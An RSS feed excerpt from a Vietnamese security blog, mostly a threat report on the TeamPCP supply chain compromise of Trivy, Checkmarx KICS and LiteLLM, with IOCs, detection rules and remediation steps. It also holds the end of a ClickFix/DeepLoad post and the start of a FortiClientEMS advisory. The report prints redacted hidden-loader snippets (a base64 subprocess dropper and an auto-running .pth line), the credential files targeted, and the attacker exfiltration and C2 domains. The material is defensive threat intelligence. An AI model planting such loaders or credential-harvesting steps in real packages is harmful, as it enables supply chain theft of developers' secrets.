<p><strong>Với hospitality sector:</strong> Review email filtering rules để flag Booking.com impersonation, đặc biệt email có link đến domain khác <code>booking.com</code> nhưng chứa từ khóa "reservation", "cancellation", "charge".</p>
<h3>Dài hạn</h3>
<p><strong>Về AI-generated code security:</strong></p>
<p>Establish <strong>AI Code Security Policy</strong> với ít nhất ba tầng kiểm soát:</p>
<ol>
<li><p><strong>Prohibited for AI generation</strong> (phải viết tay và review kỹ): authentication logic, authorization frameworks, cryptographic implementations, secrets management, payment processing.</p>
</li>
<li><p><strong>Permitted with mandatory SAST scan:</strong> CRUD operations, API integrations, UI components, utility functions. Tất cả AI-generated code phải qua SAST gate trong CI/CD trước khi merge.</p>
</li>
<li><p><strong>Prompting hygiene:</strong> Yêu cầu developers include security context trong prompts. Veracode research cho thấy một generic security reminder trong prompt cải thiện correct + secure code rate từ 56% lên 66% với Claude Opus 4.5 Thinking. Nhỏ nhưng measurable.</p>
</li>
</ol>
<p><strong>Về ClickFix và social engineering:</strong></p>
<ul>
<li>Monitor <code>mshta.exe</code> execution từ non-standard parent processes — không có business justification cho điều này trong phần lớn môi trường enterprise</li>
<li>Cân nhắc block <code>mshta.exe</code> hoàn toàn nếu organization không có use case hợp lệ (dùng AppLocker hoặc Windows Defender Application Control)</li>
<li>Implement Application Control để restrict PowerShell execution policy — user standard không cần <code>-ExecutionPolicy Bypass</code></li>
</ul>
<p><strong>Về visibility trên developer endpoints:</strong></p>
<p>EDR phải phủ developer laptop, không chỉ servers. Trong cả DeepLoad và supply chain campaigns gần đây (LiteLLM, Trivy), <strong>developer workstations là target có giá trị cao nhất</strong> — đây là nơi credentials của tất cả systems đang phát triển tồn tại.</p>
<hr />
<h2>6. IOC Tổng Hợp</h2>
<h3>DeepLoad</h3>
<pre><code># Processes cần monitor
LockAppHost.exe    ← nếu có network activity hoặc spawn child processes
filemanager.exe    ← tên được chọn để blend vào process list, nhưng không thuộc Windows
mshta.exe          ← bất kỳ outbound connection hoặc unusual parent
 
# Behaviors
PowerShell Add-Type compilation → random-named DLL trong %TEMP%
WMI event subscription creation (Event ID 5861)
USB write activity với filenames chứa: chrome, firefox, anydesk, setup, installer
Scheduled task creation từ mshta.exe hoặc PowerShell với -ExecutionPolicy Bypass
</code></pre>
<h3>PHALT#BLYX (ClickFix BSOD)</h3>
<pre><code># Domains
low-house[.]com
oncameraworkout[.]com
 
# File patterns
*.proj files trong temp directories
Internet Shortcut (.url) files trong %AppData%\Microsoft\Windows\Start Menu\Programs\Startup
 
# Process behavior
MSBuild.exe spawned by mshta.exe, wscript.exe, hoặc powershell.exe
</code></pre>
<hr />
<h2>7. Tài Liệu Tham Khảo</h2>
<ol>
<li>ReliaQuest — <em>Threat Spotlight: DeepLoad Malware Pairs ClickFix Delivery with AI-Generated Evasion</em> (2026-03-31)</li>
<li>The Hacker News — <em>DeepLoad Malware Uses ClickFix and WMI Persistence to Steal Browser Credentials</em> (2026-03-31)</li>
<li>CyberScoop — <em>Researchers say credential-stealing campaign used AI to build evasion 'at every stage'</em> (2026-03-31)</li>
<li>Dark Reading — <em>AI-Powered 'DeepLoad' Steals Credentials, Evades Detection</em> (2026-03-31)</li>
<li>Securonix — <em>Analyzing PHALT#BLYX: How Fake BSODs and Trusted Build Tools are Used to Construct a Malware Infection</em> (2026-01-05)</li>
<li>BleepingComputer — <em>ClickFix attack uses fake Windows BSOD screens to push malware</em> (2026-01-07)</li>
<li>The Hacker News — <em>Fake Booking Emails Redirect Hotel Staff to Fake BSoD Pages Delivering DCRat</em> (2026-01-07)</li>
<li>TechTarget — <em>Security risks of AI-generated code and how to manage them</em> (2025-05-29)</li>
<li>Veracode — <em>2025 GenAI Code Security Report</em> (2025-08)</li>
<li>Infosecurity Magazine — <em>Researchers Sound the Alarm on Vulnerabilities in AI-Generated Code</em> (2026-03-27)</li>
<li>The Register — <em>Using AI to code does not mean your code is more secure</em> (2026-03-26)</li>
<li>Dark Reading — <em>As Coders Adopt AI Agents, Security Pitfalls Lurk in 2026</em> (2025-12-30)</li>
</ol>
]]></content:encoded></item><item><title><![CDATA[TeamPCP Supply Chain Campaign: When the Security Scanner Became a Weapon Against AI Infrastructure
]]></title><description><![CDATA[Executive Summary
On March 24, 2026, threat group TeamPCP successfully pushed two backdoored versions of the Python library LiteLLM (v1.82.7 and v1.82.8) to PyPI — a package registry serving over 95 m]]></description><link>https://blog.fiscybersec.com/teampcp-supply-chain-campaign-when-the-security-scanner-became-a-weapon-against-ai-infrastructure</link><guid isPermaLink="true">https://blog.fiscybersec.com/teampcp-supply-chain-campaign-when-the-security-scanner-became-a-weapon-against-ai-infrastructure</guid><category><![CDATA[AI]]></category><category><![CDATA[phishing]]></category><category><![CDATA[Clickfix]]></category><category><![CDATA[threat intelligence]]></category><category><![CDATA[stealer]]></category><dc:creator><![CDATA[Vũ Nhật Lâm]]></dc:creator><pubDate>Wed, 08 Apr 2026 02:52:41 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/676511773cdd3c06f7b226ee/ddbb296d-5625-41ff-a0fb-ed829cf60280.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2>Executive Summary</h2>
<p>On March 24, 2026, threat group <strong>TeamPCP</strong> successfully pushed two backdoored versions of the Python library <strong>LiteLLM</strong> (v1.82.7 and v1.82.8) to PyPI — a package registry serving over <strong>95 million downloads per month</strong>. This was not an isolated incident. It was the final link in a systematic supply chain campaign running nearly a month, originating with the compromise of <strong>Trivy</strong> (a widely-used vulnerability scanner), pivoting through <strong>Checkmarx KICS</strong>, and culminating in LiteLLM — the LLM proxy library embedded in the majority of modern AI pipelines.</p>
<p>The payload executes immediately upon package import, or on every Python process startup via a <code>.pth</code> file mechanism. Targeted data includes: SSH keys, cloud credentials (AWS/GCP/Azure), Kubernetes secrets, database passwords, <code>.env</code> files, and cryptocurrency wallets. All harvested data is encrypted using RSA-4096/AES-256-CBC before exfiltration to attacker-controlled infrastructure.</p>
<p><strong>Immediate priority action:</strong> Audit every environment for LiteLLM installations between 10:39–16:00 UTC on March 24, 2026. If found — assume compromise and rotate all credentials.</p>
<hr />
<h2>1. Campaign Timeline</h2>
<table>
<thead>
<tr>
<th>Date / Time</th>
<th>Event</th>
</tr>
</thead>
<tbody><tr>
<td>Feb 28, 2026</td>
<td>An automated bot exploits a <code>pull_request_target</code> misconfiguration in the Trivy repository, stealing a Personal Access Token (PAT). Aqua Security addresses the visible surface but leaves residual access intact.</td>
</tr>
<tr>
<td>Mar 19, 2026</td>
<td>TeamPCP uses the residual PAT to force-push malicious code into <strong>76 of 77 version tags</strong> of <code>aquasecurity/trivy-action</code> and all tags of <code>setup-trivy</code>. Payload: a cloud credential infostealer executing inside CI/CD runners. Assigned <strong>CVE-2026-33634</strong> (CVSS 9.4).</td>
</tr>
<tr>
<td>Mar 20, 2026</td>
<td>Aqua Security detects the attack and publishes a public disclosure. Malicious artifacts are removed from distribution channels.</td>
</tr>
<tr>
<td>Mar 21–22, 2026</td>
<td>TeamPCP extends to Docker Hub with malicious Trivy images. Worm-like propagation observed through exposed SSH keys and Kubernetes APIs. 44 Aqua Security internal repositories are defaced.</td>
</tr>
<tr>
<td>Mar 23, 2026</td>
<td>Using credentials harvested from Trivy, TeamPCP compromises Checkmarx GitHub Actions: <code>kics-github-action</code> and <code>ast-github-action</code>. The domain <code>checkmarx[.]zone</code> is activated as C2.</td>
</tr>
<tr>
<td>Mar 24 – 10:39 UTC</td>
<td>LiteLLM v1.82.7 is uploaded to PyPI using the compromised maintainer account. A 12-line obfuscated payload is injected into <code>proxy_server.py</code>.</td>
</tr>
<tr>
<td>Mar 24 – 10:52 UTC</td>
<td>LiteLLM v1.82.8 is pushed, adding <code>litellm_init.pth</code> to trigger payload execution <strong>on every Python interpreter startup</strong>.</td>
</tr>
<tr>
<td>Mar 24 – 11:48 UTC</td>
<td>Researcher Callum McMahon (FutureSearch) opens GitHub Issue #24512 after his machine crashes from a fork bomb triggered by the <code>.pth</code> file.</td>
</tr>
<tr>
<td>Mar 24 – 12:44 UTC</td>
<td>Attackers use the hijacked maintainer account to close Issue #24512 and flood the thread with <strong>88 bot comments from 73 accounts in 102 seconds</strong>.</td>
</tr>
<tr>
<td>Mar 24 – 13:38 UTC</td>
<td>PyPI admins quarantine the entire litellm package. Both malicious versions are removed. Total distribution window: ~59 minutes.</td>
</tr>
</tbody></table>
<hr />
<h2>2. Attack Flow</h2>
<h3>Phase 1: Initial Access — Trivy CI/CD Compromise</h3>
<p>TeamPCP exploited the <code>pull_request_target</code> GitHub Actions workflow — a common configuration that allows PRs from fork repositories to run in the context of the base repository, with access to its secrets. After stealing the PAT, the group executed an <strong>imposter commit attack</strong>: force-pushing malicious code into all existing version tags.</p>
<p>The consequence: any pipeline using <code>uses: aquasecurity/trivy-action@v0.x.x</code> — including previously pinned versions — began executing attacker code starting March 19. Pipelines referencing version tags had no indication anything had changed; release metadata appeared untouched.</p>
<h3>Phase 2: Credential Harvesting &amp; Lateral Movement</h3>
<p><strong><code>kamikaze.sh</code></strong> — the primary payload deployed in the Trivy wave — evolved through three versions:</p>
<ul>
<li><strong>Version 1:</strong> A 150-line bash script performing environment fingerprinting and harvesting AWS/GCP/Azure credentials via the Instance Metadata Service (IMDS)</li>
<li><strong>Version 2:</strong> Added SSH key extraction, <code>.env</code> file scanning, and Kubernetes secret enumeration</li>
<li><strong>Version 3:</strong> A multi-stage dropper with persistence mechanisms</li>
</ul>
<p>The credential chain: Trivy compromise → stolen credentials unlock Checkmarx KICS → the <code>PYPI_PUBLISH</code> token for LiteLLM is exfiltrated from a GitHub Actions runner running a Trivy scan as part of its own CI/CD workflow.</p>
<h3>Phase 3: PyPI Package Poisoning — LiteLLM</h3>
<p>Attackers injected 12 lines of code into <code>litellm/proxy/proxy_server.py</code> at line 128, placed between two unrelated legitimate code blocks — a steganography-style technique designed to evade manual code review:</p>
<pre><code class="language-python"># Malicious injection at proxy_server.py:128
# Base64-encoded payload decoded and executed via subprocess
# Avoids exec() to bypass static analysis tools
import base64, subprocess, tempfile, os
_d = base64.b64decode("&lt;REDACTED_PAYLOAD&gt;")
_f = tempfile.NamedTemporaryFile(delete=False, suffix='.py')
_f.write(_d); _f.close()
subprocess.Popen(['python3', _f.name], ...)
</code></pre>
<p>Critically, <strong>the GitHub source at the corresponding commit does not contain these lines</strong> — the injection occurred during or after the wheel build process, after the source was published to the repository. Source-level code review would not have caught it.</p>
<p><strong>v1.82.8 adds <code>litellm_init.pth</code>:</strong></p>
<pre><code># litellm_init.pth — placed in site-packages
# Python's site.py processes .pth files automatically on every interpreter startup
import subprocess; subprocess.Popen(['python3', '-c', '&lt;payload&gt;'], ...)
</code></pre>
<p>The <code>.pth</code> mechanism is particularly aggressive: no <code>import litellm</code> required — as long as litellm is installed in the environment, the payload runs on every Python process startup. This is why McMahon's machine crashed: the child process triggers the <code>.pth</code> → spawns another child → exponential fork bomb. The fork bomb was an unintentional bug in the malware. Without it, the campaign would likely have gone undetected far longer.</p>
<h3>Phase 4: Multi-Stage Payload Execution</h3>
<p><strong>Stage 1 — Credential Collection:</strong></p>
<p>The payload harvests and packages the following into <code>tpcp.tar.gz</code>:</p>
<pre><code>~/.ssh/id_rsa, id_ed25519, config
~/.aws/credentials, ~/.aws/config
~/.config/gcloud/*, ~/.azure/*
~/.kube/config
**/.env files
~/.gitconfig, ~/.docker/config.json
Database passwords (PostgreSQL, MySQL)
Cryptocurrency wallet files
</code></pre>
<p>The archive is encrypted: AES-256-CBC with a random session key, the session key encrypted with a hardcoded RSA-4096 public key, then POST-ed to <code>https://models[.]litellm[.]cloud/</code> — a domain deliberately constructed to resemble LiteLLM's legitimate infrastructure.</p>
<p><strong>Stage 2 — Kubernetes Lateral Movement:</strong></p>
<p>If a Kubernetes service account token is present on the compromised host:</p>
<pre><code class="language-bash"># Payload enumerates all nodes in the cluster
kubectl get nodes --all-namespaces
# Deploys a privileged pod to EVERY node in kube-system
# Pod mounts the host filesystem (/)
# Installs persistence dropper across all nodes
</code></pre>
<p><strong>Stage 3 — Persistent Backdoor:</strong></p>
<pre><code>~/.config/sysmon/sysmon.py              # Python backdoor script
~/.config/systemd/user/sysmon.service  # Systemd service
Service display name: "System Telemetry Service"
</code></pre>
<p>The backdoor polls C2 every 50 minutes: <code>GET checkmarx[.]zone/raw</code> → receives a URL → downloads and executes the next-stage payload. Kill switch: if the response contains the string <code>youtube.com</code>, execution halts — an anti-sandbox evasion technique.</p>
<p>In Kubernetes environments, this persistence mechanism is deployed across <strong>every node</strong> in the cluster via privileged pods mounting the host filesystem.</p>
<hr />
<h2>3. Indicators of Compromise (IOC)</h2>
<h3>Network IOCs</h3>
<pre><code># C2 Domains
models[.]litellm[.]cloud     # Exfiltration endpoint (impersonates LiteLLM)
checkmarx[.]zone             # C2 backdoor polling (impersonates Checkmarx)
scan[.]aquasecurtiy[.]org    # Trivy wave C2 (typosquat of aquasecurity)
 
# Registrar: Spaceship, Inc. | Hosting: DEMENIN B.V.
</code></pre>
<h3>Host-Based IOCs</h3>
<pre><code># Files
~/.config/sysmon/sysmon.py
~/.config/systemd/user/sysmon.service
/tmp/pglog                           # Fake PostgreSQL log
/tmp/.pg_state                       # State file
tpcp.tar.gz                          # Credential archive in tmp directories
 
# Python environment
litellm_init.pth  (in site-packages)
proxy_server.py   (modified, if running litellm 1.82.7 or 1.82.8)
</code></pre>
<h3>Package Indicators</h3>
<pre><code># Malicious versions
litellm==1.82.7  (uploaded 2026-03-24 10:39:24 UTC)
litellm==1.82.8  (uploaded 2026-03-24 10:52:19 UTC)
 
# Last known-clean version
litellm==1.82.6  (published 2026-03-22, verified clean by Endor Labs)
</code></pre>
<h3>GitHub IOCs</h3>
<pre><code># Repository patterns created by attacker in victim org
docs-tpcp-*
 
# Commit message indicator
"teampcp update"
 
# Attacker Telegram channels
@Persy_PCP
@teampcp
</code></pre>
<h3>Detection — Check for Exposure</h3>
<pre><code class="language-bash"># Check installed LiteLLM version
pip show litellm 2&gt;/dev/null | grep -E "^Version|^Location"
pip list --format=freeze | grep litellm
 
# Search for the malicious .pth file
find ~/.cache/uv -name "litellm_init.pth" 2&gt;/dev/null
find /usr -name "litellm_init.pth" 2&gt;/dev/null
 
# Check for persistence artifacts
[ -f ~/.config/sysmon/sysmon.py ] &amp;&amp; echo "COMPROMISED: sysmon.py found"
[ -f ~/.config/systemd/user/sysmon.service ] &amp;&amp; echo "COMPROMISED: sysmon.service found"
 
# Search for credential archive
find /tmp -name "tpcp.tar.gz" 2&gt;/dev/null
</code></pre>
<h3>SIEM / Network Detection</h3>
<pre><code># Splunk / Elastic
dest_domain IN ("models.litellm.cloud", "checkmarx.zone", "scan.aquasecurtiy.org")
AND (http_method="POST" OR http_method="GET")
 
# Suricata — flag outbound POST to exfiltration domain
alert http any any -&gt; any any (
  msg:"TeamPCP LiteLLM Exfiltration Attempt";
  content:"models.litellm.cloud"; http_header;
  content:"POST"; http_method;
  sid:2026001; rev:1;
)
</code></pre>
<hr />
<h2>4. MITRE ATT&amp;CK Mapping</h2>
<table>
<thead>
<tr>
<th>Tactic</th>
<th>Technique</th>
<th>Detail</th>
</tr>
</thead>
<tbody><tr>
<td>Initial Access</td>
<td>T1195.002 — Compromise Software Supply Chain</td>
<td>Trojanized LiteLLM PyPI package</td>
</tr>
<tr>
<td>Initial Access</td>
<td>T1078.004 — Valid Accounts: Cloud Accounts</td>
<td>Hijacked PyPI maintainer account</td>
</tr>
<tr>
<td>Execution</td>
<td>T1059.006 — Python</td>
<td>Python payload executed via subprocess</td>
</tr>
<tr>
<td>Execution</td>
<td>T1072 — Software Deployment Tools</td>
<td>Triggered via pip install / Python startup</td>
</tr>
<tr>
<td>Persistence</td>
<td>T1546.004 — .pth hijack</td>
<td><code>litellm_init.pth</code> executes on every Python startup</td>
</tr>
<tr>
<td>Persistence</td>
<td>T1543.002 — Systemd Service</td>
<td><code>sysmon.service</code> persistent backdoor</td>
</tr>
<tr>
<td>Defense Evasion</td>
<td>T1027 — Obfuscated Files/Information</td>
<td>Base64-encoded payload, subprocess instead of exec()</td>
</tr>
<tr>
<td>Defense Evasion</td>
<td>T1036.004 — Masquerade Task/Service</td>
<td>"System Telemetry Service", fake PostgreSQL process</td>
</tr>
<tr>
<td>Credential Access</td>
<td>T1552.001 — Credentials in Files</td>
<td>Harvests .env, .aws, .ssh, .kube/config</td>
</tr>
<tr>
<td>Credential Access</td>
<td>T1552.004 — Private Keys</td>
<td>SSH private keys</td>
</tr>
<tr>
<td>Discovery</td>
<td>T1082 — System Information Discovery</td>
<td>Environment fingerprinting</td>
</tr>
<tr>
<td>Lateral Movement</td>
<td>T1610 — Deploy Container</td>
<td>Privileged pods deployed across all Kubernetes nodes</td>
</tr>
<tr>
<td>Collection</td>
<td>T1560.001 — Archive via Utility</td>
<td>Credentials packaged into tpcp.tar.gz</td>
</tr>
<tr>
<td>Exfiltration</td>
<td>T1048.003 — Exfiltration Over HTTPS</td>
<td>Encrypted POST to models.litellm.cloud</td>
</tr>
<tr>
<td>C2</td>
<td>T1071.001 — Web Protocols</td>
<td>Backdoor HTTP polling every 50 minutes</td>
</tr>
<tr>
<td>C2</td>
<td>T1568 — Dynamic Resolution</td>
<td>ICP canister as dead-drop C2 (CanisterWorm variant)</td>
</tr>
</tbody></table>
<hr />
<h2>5. Threat Actor Profile: TeamPCP</h2>
<p>TeamPCP (also tracked as <strong>PCPcat, Persy_PCP, ShellForce, DeadCatx3</strong> per Wiz Threat Center) has been active since at least December 2025. The group embeds the string <code>"TeamPCP Cloud stealer"</code> directly inside their payloads — making no attempt to hide attribution. Whether this reflects operational confidence or deliberate reputation-building is unclear.</p>
<p><strong>Defining characteristic:</strong> Each target is not an end goal — it's a <strong>pivot point to the next one</strong>. Trivy yielded credentials to reach Checkmarx KICS; KICS yielded the <code>PYPI_PUBLISH</code> token for LiteLLM. This is deliberate credential chaining, not opportunistic targeting.</p>
<p><strong>Target selection logic:</strong> TeamPCP exclusively compromises <strong>security-adjacent tools</strong> — vulnerability scanners (Trivy), IaC analyzers (KICS), LLM proxies (LiteLLM). The rationale is straightforward: these tools run with elevated privileges by design and hold broad access to credentials and infrastructure. Compromising a security tool means inheriting everything that tool was authorized to see.</p>
<p><strong>Notable capabilities:</strong></p>
<ul>
<li>Uses an <strong>AI agent (openclaw)</strong> for automated attack targeting — documented by Aikido as one of the first observed uses of an AI agent operationally in a supply chain campaign</li>
<li><strong>CanisterWorm</strong> leverages Internet Computer Protocol (ICP) as C2 — a decentralized layer that cannot be taken down by domain registrars or hosting providers</li>
<li>The botnet for comment flooding used <strong>previously compromised developer accounts</strong> rather than purpose-created profiles — <strong>76% account overlap</strong> with the botnet deployed during the Trivy disclosure (analysis by Rami McCarthy)</li>
<li>The 13-minute gap between v1.82.7 and v1.82.8 shows the attacker was <strong>actively iterating during the attack window</strong>, not executing a pre-planned script</li>
</ul>
<p>The LiteLLM compromise is <strong>Phase 09</strong> of an ongoing campaign. Endor Labs assesses with <strong>high confidence</strong> that this campaign is not over.</p>
<hr />
<h2>6. Analysis</h2>
<p>Technically, the LiteLLM attack is not especially sophisticated — the payload is straightforward, the <code>.pth</code> mechanism is well-documented, the encryption scheme is standard. What makes this incident significant is the <strong>strategic position</strong> LiteLLM occupies in modern AI infrastructure.</p>
<p>LiteLLM is not an ordinary library. It is an LLM gateway — its entire function is to hold API keys for dozens of providers simultaneously: OpenAI, Anthropic, Google Vertex, AWS Bedrock, Azure OpenAI. A single compromised LiteLLM instance doesn't lose one credential set; it loses <strong>the entire AI stack's credential surface</strong>. That is exactly why TeamPCP targeted it. The ROI per compromise is unusually high.</p>
<p>The most uncomfortable observation from a SOC perspective: <strong>this incident was not detected by EDR, SIEM, or any security tooling</strong>. It was caught by a developer who noticed his machine had frozen due to a fork bomb — an unintentional bug in the malware. Without that bug, this campaign would likely still be running. Security teams should resist the comfort of "we have EDR coverage." Does your EDR monitor developer laptops when they work remotely? Can it detect an outbound HTTPS POST to a domain that looks entirely legitimate — like <code>models.litellm.cloud</code>?</p>
<p>According to Wiz Research, LiteLLM is present in <strong>36% of monitored cloud environments</strong>. If your organization has deployed AI agents, MCP servers, or any LLM orchestration tooling in the past six months, LiteLLM is likely somewhere in your transitive dependency tree — regardless of whether anyone explicitly installed it.</p>
<p>The broader pattern to recognize: this campaign represents an <strong>escalation from build-time attacks (CI/CD pipelines) to runtime attacks (developer machines and production environments)</strong>. Traditional supply chain defense concentrates on the build pipeline. TeamPCP has pivoted directly to where credentials actually live — developer workstations. This shift demands a corresponding adjustment in threat modeling.</p>
<hr />
<h2>7. Recommendations</h2>
<h3>Immediate (0–24h)</h3>
<p><strong>Assess exposure:</strong></p>
<pre><code class="language-bash"># Check installed LiteLLM version
pip show litellm 2&gt;/dev/null | grep -E "^Version|^Location"
pip list --format=freeze | grep litellm
 
# Search all virtual environments
find / -name "litellm_init.pth" 2&gt;/dev/null
find / -path "*/litellm/proxy/proxy_server.py" -exec grep -l "tpcp\|base64" {} \; 2&gt;/dev/null
 
# Check for persistence
[ -f ~/.config/sysmon/sysmon.py ] &amp;&amp; echo "COMPROMISED: sysmon.py found"
[ -f ~/.config/systemd/user/sysmon.service ] &amp;&amp; echo "COMPROMISED: sysmon.service found"
</code></pre>
<p><strong>If v1.82.7 or v1.82.8 was ever installed:</strong></p>
<pre><code class="language-bash"># Remove package and purge cache
pip uninstall litellm -y
pip cache purge
rm -rf ~/.cache/uv
 
# Reinstall from last clean version
pip install litellm==1.82.6
</code></pre>
<p><strong>Rotate credentials in priority order:</strong></p>
<ol>
<li>PyPI tokens (if you are a package maintainer)</li>
<li>Cloud provider credentials (AWS IAM keys, GCP service accounts, Azure service principals)</li>
<li>Kubernetes kubeconfig and service account tokens</li>
<li>SSH keys</li>
<li>API keys in <code>.env</code> files</li>
<li>Database credentials</li>
<li>GitHub Personal Access Tokens</li>
</ol>
<p><strong>Review network logs for traffic to:</strong></p>
<pre><code>models.litellm.cloud
checkmarx.zone
scan.aquasecurtiy.org
</code></pre>
<p><strong>Audit Kubernetes cluster</strong> (if applicable):</p>
<pre><code class="language-bash"># Look for unauthorized pods in kube-system
kubectl get pods -n kube-system | grep -E "node-setup|alpine"
 
# Check for unexpected secret access events
kubectl get events --all-namespaces | grep -i "secret"
 
# Search for attacker-created repositories
gh api /orgs/&lt;YOUR_ORG&gt;/repos | jq '.[].name' | grep docs-tpcp
</code></pre>
<h3>Short-term (1–7 days)</h3>
<p><strong>Full dependency audit:</strong></p>
<pre><code class="language-bash"># Find all LiteLLM references across the codebase
grep -r "litellm" . --include="*.txt" --include="*.toml" --include="*.cfg"
 
# Audit transitive dependencies
pip-audit --requirement requirements.txt
# or
safety check -r requirements.txt
</code></pre>
<p><strong>Pin versions explicitly in all dependency files:</strong></p>
<pre><code># requirements.txt
litellm==1.82.6  # verified clean, explicitly pinned
</code></pre>
<p><strong>Audit CI/CD pipelines</strong> for Trivy and Checkmarx usage:</p>
<pre><code class="language-yaml"># Replace floating version tags with commit SHAs
# BEFORE (unsafe)
uses: aquasecurity/trivy-action@v0.20.0
 
# AFTER (safe — pinned to commit SHA)
uses: aquasecurity/trivy-action@9b2b452e66...  # verify SHA from official channel
</code></pre>
<p><strong>Add network egress monitoring:</strong> Restrict outbound connections from build environments to explicitly whitelisted domains. On developer endpoints, flag unusual outbound HTTPS POST requests — particularly to recently registered domains.</p>
<h3>Long-term</h3>
<p><strong>Adopt a dependency pinning strategy across the board:</strong></p>
<ul>
<li>Use lock files (<code>poetry.lock</code>, <code>uv.lock</code>, hashed <code>requirements.txt</code>) for all production deployments</li>
<li>Implement a private package mirror (Artifactory, Nexus) with malware scanning before packages enter internal environments</li>
<li>Automate SBOM generation in CI/CD to maintain a complete transitive dependency inventory</li>
</ul>
<p><strong>Harden CI/CD pipelines:</strong></p>
<ul>
<li>Never expose <code>GITHUB_TOKEN</code> or long-lived secrets in workflows triggered by <code>pull_request_target</code> from forks</li>
<li>Pin all GitHub Actions to commit SHAs — version tags can be force-pushed without warning</li>
<li>Replace long-lived PyPI publishing tokens with OIDC-based short-lived tokens</li>
</ul>
<p><strong>Build detection capability:</strong></p>
<ul>
<li>Deploy EDR with visibility on developer endpoints, not only production servers</li>
<li>Integrate PyPI malware feeds (Sonatype OSS Index, Checkmarx SCA, Snyk) as a CI/CD quality gate</li>
<li>Alert on <code>.pth</code> file creation in Python <code>site-packages</code> directories</li>
<li>Monitor for newly created systemd user services on Linux endpoints</li>
</ul>
<p><strong>Establish AI tooling governance:</strong></p>
<ul>
<li>Inventory all AI-related packages in active use across the organization</li>
<li>Assign human ownership to every AI agent or tool in operation</li>
<li>Apply least-privilege to AI agent credentials — use ephemeral, sender-constrained tokens rather than long-lived API keys</li>
<li>Do not connect AI agents to production systems during the experimentation phase</li>
</ul>
<hr />
<h2>8. References</h2>
<ol>
<li>Orca Security — <em>LiteLLM Supply Chain Attack: Malware &amp; Mitigation</em> (2026-03-24)</li>
<li>Endor Labs — <em>TeamPCP Isn't Done: Threat Actor Behind Trivy and KICS Compromises Now Hits LiteLLM's 95 Million Monthly Downloads on PyPI</em> (2026-03-24)</li>
<li>Snyk — <em>How a Poisoned Security Scanner Became the Key to Backdooring LiteLLM</em> (2026-03-26)</li>
<li>FutureSearch / Callum McMahon — <em>litellm 1.82.8 Supply Chain Attack on PyPI (March 2026)</em> (2026-03-24)</li>
<li>Palo Alto Networks Unit 42 — <em>Weaponizing the Protectors: TeamPCP's Multi-Stage Supply Chain Attack on Security Infrastructure</em> (2026-04-01)</li>
<li>Arctic Wolf — <em>TeamPCP Supply Chain Attack Campaign Targets Trivy, Checkmarx (KICS), and LiteLLM</em> (2026-03-24)</li>
<li>Kaspersky — <em>Trojanization of Trivy, Checkmarx, and LiteLLM solutions</em> (2026-04-03)</li>
<li>SANS Institute — <em>When the Security Scanner Became the Weapon: Inside the TeamPCP Supply Chain Campaign</em> (2026-04-03)</li>
<li>LiteLLM Official — <em>Security Update: Suspected Supply Chain Incident</em> (2026-03-24)</li>
<li>GitGuardian — <em>How GitGuardian Enables Rapid Response to the LiteLLM Supply Chain Attack</em> (2026-03-30)</li>
<li>Sonatype — <em>Compromised litellm PyPI Package Delivers Multi-Stage Credential Stealer</em> (2026-04-03)</li>
<li>InfoQ — <em>PyPI Supply Chain Attack Compromises LiteLLM, Enabling the Exfiltration of Sensitive Information</em> (2026-04-01)</li>
</ol>
]]></content:encoded></item><item><title><![CDATA[Lỗ hổng zero-day nghiêm trọng trong FortiClientEMS đang bị khai thác trên thực tế]]></title><description><![CDATA[Fortinet vừa qua đã phát hành bản vá khẩn cấp một lỗ hổng nghiêm trọng mới, tồn tại trong FortiClientEMS của hãng, cho phép tin tặc lợi dụng và khai thác thực thi mã từ xa. Đáng chú ý, kể từ đầu năm 2]]></description><link>https://blog.fiscybersec.com/l-h-ng-zero-day-nghi-m-tr-ng-trong-forticlientems-ang-b-khai-th-c-tr-n-th-c-t</link><guid isPermaLink="true">https://blog.fiscybersec.com/l-h-ng-zero-day-nghi-m-tr-ng-trong-forticlientems-ang-b-khai-th-c-tr-n-th-c-t</guid><category><![CDATA[threat intelligence]]></category><category><![CDATA[Fortinet ]]></category><category><![CDATA[fortinet-client-ems]]></category><category><![CDATA[vulnerability]]></category><dc:creator><![CDATA[Mai Đức Nam Anh]]></dc:creator><pubDate>Mon, 06 Apr 2026 03:30:00 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/669e7a2f2c109ecd663148bd/00b618f5-4369-420c-87b8-8987d38504ca.webp" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Fortinet vừa qua đã phát hành bản vá khẩn cấp một lỗ hổng nghiêm trọng mới, tồn tại trong FortiClientEMS của hãng, cho phép tin tặc lợi dụng và khai thác thực thi mã từ xa. Đáng chú ý, kể từ đầu năm 2026 tới nay, đây là lần thứ hai Fortinet phải phát hành bản vá khẩn cấp cho sản phẩm này, đồng thời hãng cũng xác nhận lỗ hổng zero-day này đang bị tin tặc tích cực khai thác trên thực tế, song song với lỗ hổng đã biết trước đó.</p>
<h3>Thông tin chi tiết</h3>
<ul>
<li><p><em>Định danh lỗ hổng:</em> <a href="https://nvd.nist.gov/vuln/detail/CVE-2026-35616"><strong>CVE-2026-35616</strong></a></p>
</li>
<li><p><em>Điểm CVSS (3.1):</em> <strong>9.8</strong></p>
</li>
<li><p><em>Mức độ nghiêm trọng:</em> <strong>CRITICAL</strong> - Cực kỳ nghiêm trọng</p>
</li>
<li><p><em>Mô tả:</em> Lỗi kiểm soát truy cập sai cách (improper access control) trong FortinetClientEMS có thể bị kẻ tấn công ẩn danh (unauthenticated attacker) khai thác thực thi mã hoặc chạy lệnh hệ thống trái phép thông qua các request độc hại gửi tới máy chủ mục tiêu.</p>
</li>
<li><p><em>Phiên bản bị ảnh hưởng:</em> FortinetClientEMS phiên bản <code>7.4.5</code> đến <code>7.4.6</code></p>
</li>
</ul>
<p><strong>FortiClientEMS</strong> hay FortiClient Enterprise Management Server đóng vai trò là một máy chủ bảo mật cho phép quản lý tập trung các thiết bị đầu cuối (endpoint) trong mạng nội bộ của doanh nghiệp. Phần mềm này cho phép quản trị viên có thể dễ dàng triển khai, cấu hình, giám sát và cập nhật FortiClient trên nhiều máy tính một cách tự động, đồng thời kiểm soát bảo mật đối với các thiết bị trong mạng lưới cũng như thay đổi các chính sách, tuân thủ nội bộ.</p>
